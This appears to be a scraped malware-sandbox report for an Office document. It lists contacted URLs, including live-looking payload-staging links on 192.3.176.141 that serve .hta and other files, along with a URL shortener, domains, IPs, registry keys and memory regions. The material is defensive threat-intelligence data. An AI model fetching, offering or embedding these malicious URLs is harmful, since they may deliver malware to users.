94.156.177.220
|
|
|
|
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
|
192.3.176.141
|
|
|
|
http://192.3.176.141/42/LOGLKI.txt
|
192.3.176.141
|
|
|
|
https://qrisni.me/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htat=nebulous&
|
unknown
|
||
|
https://qrisni.me/F
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
http://192.3.176.141/
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htaC:
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
https://qrisni.me/E
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htacC:
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://192.3.176.141/42/logistic
|
unknown
|
||
|
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIFp
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta...
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://qrisni.me/O
|
unknown
|
||
|
http://192.3.176.141/viderC
|
unknown
|
||
|
https://drive.gop
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.hta...v
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htaha
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htapV
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://qrisni.me/pV
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
https://qrisni.me/8qnMUw?&italian=tough&bladder=wrathful&singer=juvenile&tugboat=nebulous&poignance=purple&twig=mature&constant=many&set=frightened§ion
|
188.114.97.3
|
||
|
https://qrisni.me/4
|
unknown
|
||
|
http://192.3.176.141/42/ug/seethebestthingsevermeetwithgreatthingstobegood.htahttp://192.3.176.141/4
|
unknown
|
||
|
http://192.3.176.141/vider
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
https://qrisni.me/8qnMUw?&italian=tough&bladder=wrathful&singer=juvenile&tugboat=nebulous&poignance=
|
unknown
|
There are 34 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
qrisni.me
|
188.114.97.3
|
||
|
drive.google.com
|
142.250.186.46
|
||
|
drive.usercontent.google.com
|
142.250.185.97
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.176.141
|
unknown
|
United States
|
|
|
|
94.156.177.220
|
unknown
|
Bulgaria
|
|
|
|
142.250.186.46
|
drive.google.com
|
United States
|
||
|
188.114.97.3
|
qrisni.me
|
European Union
|
||
|
188.114.96.3
|
unknown
|
European Union
|
||
|
142.250.185.97
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
-/0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
2060
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1036
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2A766
|
2A766
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
q80
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34B71
|
34B71
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34C6B
|
34C6B
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35225
|
35225
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34C6B
|
34C6B
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 80 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
443000
|
heap
|
page read and write
|
||
|
1FD7000
|
direct allocation
|
page read and write
|
||
|
1FE3000
|
direct allocation
|
page read and write
|
||
|
574000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
14F000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
38F000
|
direct allocation
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
3CAF000
|
stack
|
page read and write
|
||
|
5C4000
|
heap
|
page read and write
|
||
|
462B000
|
heap
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
58C2000
|
heap
|
page read and write
|
||
|
50BB000
|
heap
|
page read and write
|
||
|
45BF000
|
heap
|
page read and write
|
||
|
37E0000
|
heap
|
page read and write
|
||
|
1C1C0000
|
heap
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
4F99000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
2DD000
|
heap
|
page read and write
|
||
|
50D0000
|
trusted library allocation
|
page read and write
|
||
|
5571000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1CB4000
|
heap
|
page read and write
|
||
|
33DE000
|
trusted library allocation
|
page read and write
|
||
|
50CA000
|
heap
|
page read and write
|
||
|
472A000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F53000
|
heap
|
page read and write
|
||
|
1F50000
|
heap
|
page read and write
|
||
|
50CA000
|
heap
|
page read and write
|
||
|
3EE0000
|
trusted library allocation
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
45F1000
|
heap
|
page read and write
|
||
|
346000
|
heap
|
page read and write
|
||
|
463F000
|
heap
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
2F4000
|
heap
|
page read and write
|
||
|
58C3000
|
heap
|
page read and write
|
||
|
292C000
|
trusted library allocation
|
page read and write
|
||
|
3430000
|
direct allocation
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
1FF000
|
heap
|
page read and write
|
||
|
1A848000
|
stack
|
page read and write
|
||
|
5808000
|
heap
|
page read and write
|
||
|
16F000
|
trusted library allocation
|
page read and write
|
||
|
417000
|
heap
|
page read and write
|
||
|
1CA3F000
|
stack
|
page read and write
|
||
|
1C8000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
5971000
|
heap
|
page read and write
|
||
|
1A748000
|
heap
|
page execute and read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
4614000
|
heap
|
page read and write
|
||
|
4624000
|
heap
|
page read and write
|
||
|
1AF6000
|
heap
|
page read and write
|
||
|
5390000
|
heap
|
page read and write
|
||
|
2680000
|
trusted library allocation
|
page execute read
|
||
|
53EE000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
3740000
|
trusted library allocation
|
page execute
|
||
|
396000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
462D000
|
heap
|
page read and write
|
||
|
1A0000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
7FE8988D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
385000
|
heap
|
page read and write
|
||
|
29F000
|
heap
|
page read and write
|
||
|
12071000
|
trusted library allocation
|
page read and write
|
||
|
26C4000
|
heap
|
page read and write
|
||
|
1A994000
|
heap
|
page read and write
|
||
|
39C0000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
heap
|
page read and write
|
||
|
3B0B000
|
stack
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
|
566C000
|
heap
|
page read and write
|
||
|
4545000
|
heap
|
page read and write
|
||
|
269000
|
heap
|
page read and write
|
||
|
2071000
|
trusted library allocation
|
page read and write
|
||
|
5FB000
|
heap
|
page read and write
|
||
|
450C000
|
heap
|
page read and write
|
||
|
123000
|
heap
|
page read and write
|
||
|
50CE000
|
heap
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
1C1D6000
|
heap
|
page read and write
|
||
|
5937000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
1AA8E000
|
stack
|
page read and write
|
||
|
2612000
|
trusted library allocation
|
page read and write
|
||
|
E3000
|
heap
|
page read and write
|
||
|
4FCC000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3E5000
|
heap
|
page read and write
|
||
|
3EA000
|
heap
|
page read and write
|
||
|
595C000
|
heap
|
page read and write
|
||
|
4735000
|
heap
|
page read and write
|
||
|
2DD000
|
heap
|
page read and write
|
||
|
37B4000
|
heap
|
page read and write
|
||
|
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
|
3490000
|
remote allocation
|
page read and write
|
||
|
3058000
|
trusted library allocation
|
page read and write
|
||
|
40E0000
|
trusted library allocation
|
page read and write
|
||
|
311000
|
heap
|
page read and write
|
||
|
1BB6000
|
heap
|
page read and write
|
||
|
281000
|
heap
|
page read and write
|
||
|
34B5000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
1C5DC000
|
stack
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
2752000
|
trusted library allocation
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
37D000
|
heap
|
page read and write
|
||
|
1CAAE000
|
stack
|
page read and write
|
||
|
2B9000
|
heap
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
4558000
|
heap
|
page read and write
|
||
|
4A90000
|
heap
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
351000
|
heap
|
page read and write
|
||
|
3443000
|
direct allocation
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
406F000
|
trusted library allocation
|
page read and write
|
||
|
273000
|
stack
|
page read and write
|
||
|
510000
|
heap
|
page read and write
|
||
|
39F0000
|
trusted library allocation
|
page read and write
|
||
|
4F4000
|
heap
|
page read and write
|
||
|
1FD0000
|
direct allocation
|
page read and write
|
||
|
57B7000
|
heap
|
page read and write
|
||
|
58E000
|
heap
|
page read and write
|
||
|
4C4000
|
heap
|
page read and write
|
||
|
3B7F000
|
stack
|
page read and write
|
||
|
3A6000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
35DA000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
52E000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
36A000
|
heap
|
page read and write
|
||
|
1C2BA000
|
heap
|
page read and write
|
||
|
7F000
|
heap
|
page read and write
|
||
|
3C60000
|
trusted library allocation
|
page read and write
|
||
|
3C30000
|
trusted library allocation
|
page read and write
|
||
|
36F0000
|
heap
|
page read and write
|
||
|
3EA000
|
heap
|
page read and write
|
||
|
6E31000
|
trusted library allocation
|
page read and write
|
||
|
2B00000
|
remote allocation
|
page read and write
|
||
|
1A070000
|
heap
|
page read and write
|
||
|
4A98000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
3EF000
|
heap
|
page read and write
|
||
|
5939000
|
heap
|
page read and write
|
||
|
45F3000
|
heap
|
page read and write
|
||
|
3C60000
|
trusted library allocation
|
page read and write
|
||
|
472E000
|
heap
|
page read and write
|
||
|
1AF000
|
heap
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
5949000
|
heap
|
page read and write
|
||
|
5371000
|
heap
|
page read and write
|
||
|
375A000
|
heap
|
page read and write
|
||
|
6235000
|
heap
|
page read and write
|
||
|
473F000
|
heap
|
page read and write
|
||
|
4624000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
6431000
|
trusted library allocation
|
page read and write
|
||
|
162000
|
heap
|
page read and write
|
||
|
4FD1000
|
heap
|
page read and write
|
||
|
1CD4000
|
heap
|
page execute and read and write
|
||
|
4771000
|
trusted library allocation
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
27EC000
|
trusted library allocation
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
4A9F000
|
heap
|
page read and write
|
||
|
575000
|
heap
|
page read and write
|
||
|
224000
|
heap
|
page read and write
|
||
|
375A000
|
heap
|
page read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
34A9000
|
trusted library allocation
|
page read and write
|
||
|
3D8000
|
heap
|
page read and write
|
||
|
45E7000
|
heap
|
page read and write
|
||
|
3CF5000
|
heap
|
page read and write
|
||
|
24E000
|
heap
|
page read and write
|
||
|
41F000
|
heap
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
392000
|
heap
|
page read and write
|
||
|
579000
|
heap
|
page read and write
|
||
|
1C680000
|
heap
|
page read and write
|
||
|
40D0000
|
trusted library allocation
|
page read and write
|
||
|
58BE000
|
heap
|
page read and write
|
||
|
46D6000
|
heap
|
page read and write
|
||
|
45EF000
|
heap
|
page read and write
|
||
|
E1000
|
heap
|
page read and write
|
||
|
3817000
|
heap
|
page read and write
|
||
|
3819000
|
heap
|
page read and write
|
||
|
53EF000
|
heap
|
page read and write
|
||
|
4AAB000
|
heap
|
page read and write
|
||
|
1A949000
|
heap
|
page read and write
|
||
|
5939000
|
heap
|
page read and write
|
||
|
473E000
|
heap
|
page read and write
|
||
|
26A6000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
trusted library allocation
|
page read and write
|
||
|
23EA000
|
heap
|
page read and write
|
||
|
4AA9000
|
heap
|
page read and write
|
||
|
1E34000
|
heap
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
35EA000
|
trusted library allocation
|
page read and write
|
||
|
5945000
|
heap
|
page read and write
|
||
|
1DB0000
|
heap
|
page execute and read and write
|
||
|
2E50000
|
trusted library allocation
|
page execute read
|
||
|
1B5F0000
|
heap
|
page read and write
|
||
|
1D20000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
30B0000
|
trusted library allocation
|
page execute
|
||
|
40D0000
|
trusted library allocation
|
page read and write
|
||
|
4AA6000
|
heap
|
page read and write
|
||
|
5939000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
227000
|
heap
|
page read and write
|
||
|
405E000
|
trusted library allocation
|
page read and write
|
||
|
23E6000
|
heap
|
page read and write
|
||
|
1B094000
|
heap
|
page read and write
|
||
|
70000
|
heap
|
page read and write
|
||
|
1C64000
|
heap
|
page read and write
|
||
|
574000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
577000
|
heap
|
page read and write
|
||
|
23FA000
|
heap
|
page read and write
|
||
|
4FA2000
|
heap
|
page read and write
|
||
|
5997000
|
heap
|
page read and write
|
||
|
4682000
|
heap
|
page read and write
|
||
|
3C2000
|
heap
|
page read and write
|
||
|
45F7000
|
heap
|
page read and write
|
||
|
1D8F000
|
stack
|
page read and write
|
||
|
3A7000
|
heap
|
page read and write
|
||
|
1A143000
|
heap
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
504D000
|
heap
|
page read and write
|
||
|
400000
|
heap
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
35E5000
|
trusted library allocation
|
page read and write
|
||
|
306F000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
2A8000
|
heap
|
page read and write
|
||
|
39B000
|
heap
|
page read and write
|
||
|
37C000
|
heap
|
page read and write
|
||
|
3A07000
|
trusted library allocation
|
page read and write
|
||
|
7FE89882000
|
trusted library allocation
|
page read and write
|
||
|
1B645000
|
heap
|
page read and write
|
||
|
39FE000
|
trusted library allocation
|
page read and write
|
||
|
20F1000
|
trusted library allocation
|
page read and write
|
||
|
504E000
|
heap
|
page read and write
|
||
|
2F1000
|
stack
|
page read and write
|
||
|
425000
|
heap
|
page read and write
|
||
|
35ED000
|
trusted library allocation
|
page read and write
|
||
|
2A7000
|
heap
|
page read and write
|
||
|
7FE89A40000
|
trusted library allocation
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
313000
|
heap
|
page read and write
|
||
|
562000
|
heap
|
page read and write
|
||
|
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
1E10000
|
heap
|
page read and write
|
||
|
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
|
3B7000
|
heap
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
3F7000
|
heap
|
page read and write
|
||
|
22F0000
|
heap
|
page read and write
|
||
|
564000
|
heap
|
page read and write
|
||
|
304A000
|
stack
|
page read and write
|
||
|
58C2000
|
heap
|
page read and write
|
||
|
463D000
|
heap
|
page read and write
|
||
|
480E000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
4DE3000
|
heap
|
page read and write
|
||
|
57C5000
|
heap
|
page read and write
|
||
|
25AD000
|
trusted library allocation
|
page read and write
|
||
|
2D8000
|
heap
|
page read and write
|
||
|
25F000
|
heap
|
page read and write
|
||
|
1B38E000
|
stack
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
4A3E000
|
trusted library allocation
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
58F5000
|
heap
|
page read and write
|
||
|
1BF4000
|
heap
|
page read and write
|
||
|
3CCA000
|
stack
|
page read and write
|
||
|
5409000
|
heap
|
page read and write
|
||
|
35ED000
|
trusted library allocation
|
page read and write
|
||
|
5964000
|
heap
|
page read and write
|
||
|
1A9FC000
|
stack
|
page read and write
|
||
|
4591000
|
heap
|
page read and write
|
||
|
3C1000
|
heap
|
page read and write
|
||
|
5939000
|
heap
|
page read and write
|
||
|
50B4000
|
heap
|
page read and write
|
||
|
4FCB000
|
heap
|
page read and write
|
||
|
53F8000
|
heap
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
3751000
|
heap
|
page read and write
|
||
|
57BF000
|
heap
|
page read and write
|
||
|
37B4000
|
heap
|
